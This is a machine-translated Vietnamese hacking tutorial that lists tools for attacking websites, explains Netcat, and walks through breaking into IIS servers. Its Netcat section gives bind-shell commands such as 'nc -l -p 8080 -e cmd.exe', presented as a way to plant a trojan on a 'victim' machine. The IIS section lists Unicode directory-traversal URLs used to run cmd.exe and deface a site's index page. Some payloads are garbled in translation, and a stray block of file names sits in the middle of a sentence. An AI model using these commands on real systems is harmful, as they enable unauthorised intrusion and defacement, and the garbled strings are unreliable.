47.) Tools needed to hack Web:
For professional hackers, they will not need to use these tools, they will directly set up the version that the victim's Web site uses on their machine to test the error. But for those new to the profession, these tools are very necessary, use them a few times you will know how to coordinate them to find the error on the victim site is fastest. Here are some of the tools you need to have on your "do" machine:
Tool 2: You need a shell account, which is really important to you. A good shell account is a shell account that lets you run major programs like nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, In compiling C exploits like MinGW, Cygwin and other dev tools.
Shell account is similar to DOS shell, but it has more commands and functions than DOS. Normally when you install Unix, you will have a shell account, if you do not install Unix then you should register on a shell account free network or if someone install Unix and set up a shell account you can log Go to telnet (Start -> Run -> type Telnet) to use that shell account. Here are some places you can register a free shell account:
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
3rd tool: NMAP is a fast, powerful scanning tool. Can scan on wide area network and especially good for single network. NMAP helps you see which services are running on the server (services / ports: webserver, ftpserver, pop3, ...), what server are running, what type of firewall the server is using, and so on. In general, NMAP supports most of the scanning techniques such as ICMP (ping aweep), IP protocol, Null scan, TCP SYN (half open), ... NMAP is considered as the leading tool of Hacker as well as network administrators around the world.
All information about NMAP you refer to http://www.insecure.org/
4th tool: Stealth HTTP Security Scanner is a great security scanner tool on Win32. It can scan more than 13000 security bugs and identify other 5000 exploits.
Tool 5: IntelliTamper is a tool that displays the structure of a Web site, including folders and files, which can list both the directory and the file that has the password set. Very convenient for Hack Website because before you hack a Website then you have to grab some information of Admin and Website.
Tool 6: Netcat is a tool for reading and writing data over the network via TCP or UDP. You can use Netcat 1 directly or use other scripts to control Netcat. Netcat is considered an exploit because it can establish a connection between you and the server for reading and writing data (of course, when Netcat is installed on a vulnerable server). All information about Netcat you can refer to http://www.l0pht.com/
Tool 7: Active Perl is a tool that reads *. Pl. Perl files because exploits are usually written in Perl. It is also used to execute commands through 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com .pl files.
Eighth tool: Linux is the operating system most hackers use.
Tool 9: L0phtCrack is the number one tool to crack Windows NT / 2000 passwords.
Download I did not say here, you when Download remember to pay attention to the version of them, which version has the largest number of you please go down because it will have some more features. which the previous version did not have. If you do not know how to use it, then find the old posts that have instructions box "Occupation". If you still do not see the post, ask the other party will answer you.
48.) Netcat Manual:
a. ) Introduce : Netcat is an indispensable tool if you want to hack a website because it is very powerful and handy. So you need to know a bit about Netcat.
b. ) Translate :
For Netcat for Linux, you must compile it before use.
Edit the netcat.c file using vi: netcat.c
+ find the line res_init (); in main () and added before the `` / ``: // res_init ();
+ add the following two lines to #define (located at the beginning of the file):
#define GAPING_SECURITY_HOLE
#define TELNET
- make linux
- run: ./nc -h
- if you want to run Netcat with nc instead of ./nc, you just need to modify the PATH environment variable in the ~ / .bashrc file, adding ``: .``
PATH = / sbin: / usr / sbin: ...:.
Netcat for Win does not need to compile because of the binary file nc.exe. Only then unpack and run.
c. ) The options of Netcat:
Netcat runs in command line mode. You run nc -h for the following parameters:
CODE
C: & gt; nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
để nbound: nc -l -p port [tùy_chọn] [hostname] [port]
options:
-d ----------- separate Netcat from command window or console, Netcat will run in steath mode (not displayed in Taskbar)
prog --- execute program prog, commonly used in listening mode
-h ----------- call the instruction
-i secs ----- delay secs milliseconds before sending a data line off
-l ------------- puts Netcat into listen mode to wait for incoming connections
-L ------------ forces Netcat to `` try `` listen. It will listen back every time a connection is disconnected.
------------ only use IP address in digital form, such as 192.168.16.7, Netcat will not interrogate DNS-o ------------ write file log file
-p port ----- specify port port
-r request Netcat select random port (random)
-s addr ----- spoofed source IP address is addr
-t ------------- Do not send additional information in a telnet session. When you telnet to a telnetd, telnetd usually requires your telnet client to send additional information such as the TERM, USER environment variable. If you use netcat with the -t option to telnet, netcat will not send this information to telnetd.
-u ------------- using UDP (the default netcat using TCP)
-v ------------- show detailed information about the current connection.
-vv ----------- will display more detailed information.
-w secs ---- set the timeout time for each connection is secs milliseconds
-z ------------- zero I / O mode, usually used when scanning ports
Netcat supports the port range. Syntax is port1-port2. For example, 1-8080 means 1,2,3, .., 8080
d. ) Learn Netcat through the example:
_ The banner of the web server:
For example, nc to 172.16.84.2, port 80
CODE
C: & gt; nc 172.16.84.2 80
HEAD / HTTP / 1.0 (here you enter 2 times)
HTTP / 1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer / 1.3.19 (Linux-Mandrake / 3mdk) mod_ssl / 2.8.2
OpenSSL / 0.9.6 PHP / 4.0.4pl1
Connection: close
Content-Type: text / html
For detailed connection information, you can use -v (-vv will
for more details)
C: & gt; nc -vv 172.16.84.1 80
CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) 1 80 (?) Open
HEAD / HTTP / 1.0
HTTP / 1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache / 1.3.20 (Win32)
Last Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: `` 0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text / html
sent 17, rcvd 245: NOTSOCK
If you want to log, use -o
. For example: <tên_file> nc -vv -o nhat_ki.log 172.16.84.2 80
see file nhat_ki.log see what it has written nhé:
CODE
& lt; 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP / 1.1 200 OK.
& lt; 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04F
& lt; 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
& lt; 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
& lt; 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache / 1.3.20 (Win
& lt; 00-005050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) .. Last-Modifi
& lt; 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
& lt; 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
& lt; 00: 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: `` 0-cec-
& lt; 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accept
& lt; 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
& lt; 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
& lt; 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
& lt; 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
& lt; 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text / htm
& lt; 000000f0 6c 0d 0a 0d 0a # l ....
& lt; This means that the server sends to netcat
& gt; That means netcat is sent to the server
Port scanning:
Run netcat with the -z option. But to scan ports faster, use -n because netcat will not need DNS. For example, to scan the TCP ports (1- & gt; 500) of the host 172.16.106.1
CODE
[dt @ vicki /] # nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) 1 443 (?) Open
(UNKNOWN) 1 139 (?) Open
(UNKNOWN) 1 111 (?) Open
(UNKNOWN) 1 80 (?) Open
(UNKNOWN) 1 23 (?) Open
If you need to scan UDP ports, use -u
CODE
[dt @ vicki /] # nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) 1 1025 (?) Open
(UNKNOWN) 1 1024 (?) Open
(UNKNOWN) 1 138 (?) Open
(UNKNOWN) 1 137 (?) Open
(UNKNOWN) 1 123 (?) Open
(UNKNOWN) 1 111 (?) Open
Turn Netcat into a Trojan:
On the victim machine, start netcat into listen mode, using the -l (listen) and -p port options to specify the port number to listen to, -e
To require netcat to execute a program when a connection is made, usually the cmd.exe command shell (for NT) or / bin / sh (for Unix). For example: <tên_chương_trình_cần_chạy> CODE
E: & gt; nc -nvv -l -p 8080 -e cmd.exe
nghe về [bất kỳ] 8080 ...
Connect to 1 from (UNKNOWN) 1 3159
bị lỗi 0, rcvd 0: không rõ ổ cắm sockets
On the computer used to attack, you just use netcat to connect to the victim machine on the designated port, such as 8080
CODE
C: & gt; nc-nvv 172.16.84.2 8080
(UNKNOWN) 1 8080 (?) Open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E: & gt; cd test
cd test
E: test & gt; dir / w
dir / w
Kích thước trong đĩa E không có nhãn.
Volume Serial Number is B465-452F
Directory of E: test
[.] [..] NET.EXE head.log NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File (s) 262,499 bytes
2 Dir (s) 191,488,000 bytes free
C: test & gt; exit
exit
sent 20, rcvd 450: NOTSOCK
As you have seen, we can do what on the victim machine, then just some basic commands, we have captured the opponent's computer, please take a look:
CODE
E: & gt; nc -nvv -L -p 8080 -e cmd.exe
đang nghe [không] 8080 ...?
Particularly for Netcat for Win, you can listen on the listening port. Just specify a source address of -s & lt; s_ip_mode & gt; . For example:
CODE
netstat -a
...
TCP nan_nhan: domain nan_nhan: 0 LISTENING & lt; - port 53 is listening
...
E: & gt; nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - & gt; Listen on port 53
nghe trên 1 53 ...
Connect to 1 from (UNKNOWN) 1 3163?
On Windows NT, in order to set Netcat to listen, there is no need to have Administrator privileges, just login with a normal Netcat startup username.
Note: You can not run netcat with ... -u -e cmd.exe ... or ...- u -e / bin / sh ... because netcat will not work properly. If you want a UDP shell on Unix, use udpshell instead of netcat.
(Based on Vicky's article)
49.) Hacking IIS server 5.0:
The IIS server with versions prior to version 5.0 has a bug that we can exploit, since most people now use IIS 5.0 so the error in previous versions did not mention it. Now I will show you how to hack through the activeperl and IE tools, you can manipulate the Web in Vietnam because they have so many errors. Let's get started.
First of all download activeperl and Unicode.pl.
Use telnet to determine if your Web site is attacking using IIS server 5.0.
CODE
telnet & lt; Web Page Title & gt; 80
GET HEAD / HTTP / 1.0
If it does not tell us what the target is using, change port 80 to 8080, 81, 8000, 8001 etc.
After you have identified your target DOS type:
CODE
perl unicode.pl
Host: (type the server address you want to hack)
Port: 80 (or 8080, 81, 8000, 8001 depending on which port you have telnet before).
You will see the error log (programmed in Unicode.pl) as follows:
CODE
1 /scripts/..%0%af../winnt/system32/cmd.exe?/c+
[2] / scripts ..% c1% 9c ../ winnt / system32 / cmd.exe? / C +
[3] /scripts/..%1pp../winnt/system32/cmd.exe?/c+
[4] / scripts /..% c0% 9v ../ winnt / system32 / cmd.exe? / C +
[5] /scripts/..%00qq../winnt/system32/cmd.exe?/c+
[6] /scripts/..%1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%11c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%1af../winnt/system32/cmd.exe?/c+
1 /scripts/..%e080%af../winnt/system32/cmd.exe?/c+
1 / scripts /..% f0% 80% 80% af ../ winnt / system32 / cmd.ex e? / C +
1 /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe? / C +
1 / scripts /..% fc% 80% 80% 80% 80% af ../ winnt / system32 / cmd.exe? / C +
1 / msadc /..% e0% 80% af ../..% e0% 80% af ../..% e0% 80% af ../ winnt / system32 / cmd.exe? / C +
1 / cgi-bin /..% c0% af ..% c0% af ..% c0% af ..% c0% af ..% c0% af ../ winnt / system32 / cmd.exe? c +
[Cn]% c0% af%
1 / iisadmpwd /..% c0% af ..% c0% af ..% c0% af ..% c0% af ..% c 0% af ../ winnt / system32 / cmd.exe? / C +
[Cn]% c0% af ..% c0% af ..% c0% af ../ winnt / system32 / cmd.exe? / C +
[Cn]% c0% af% c0% af ..% c0% af ../ winnt / system32 / cmd.exe? / C +
[20] / adsamples /..% c0% af ..% c0% af ..% c0% af ..% c0% af ..% c 0% af ../ winnt / system32 / cmd.exe? / C +
You will see all the errors on the Web if the victim has all such errors, if the victim's server only errors 13 and 17, the results table only appears 13 and 17 only.
I took a result table to tell me the victim site is the 3rd and 7th error, I will go to IE and enter the corresponding code on the Address:
http://www.winx.com/scripts/..%C1%P c ../ winnt / system32 / cmd.exe? / c +
& lt; == third line error or
http://www.winx.com/scripts/..%1%1 c ../ winnt / system32 / cmd.exe? / c +
& lt; == 7th line error Here you can access the victim's server and then, you use the command in the DOS that exploits the information in this. Usually the site is located in the directory vinetpubwwwroot, then you just go to index.html instead of the name hack by .... Okay, do not stir them up.
GOOKLUCK !!!!!!!!!!!!!!!
(End of Section 8)
Anhdenday
HVAonline
HVAonline
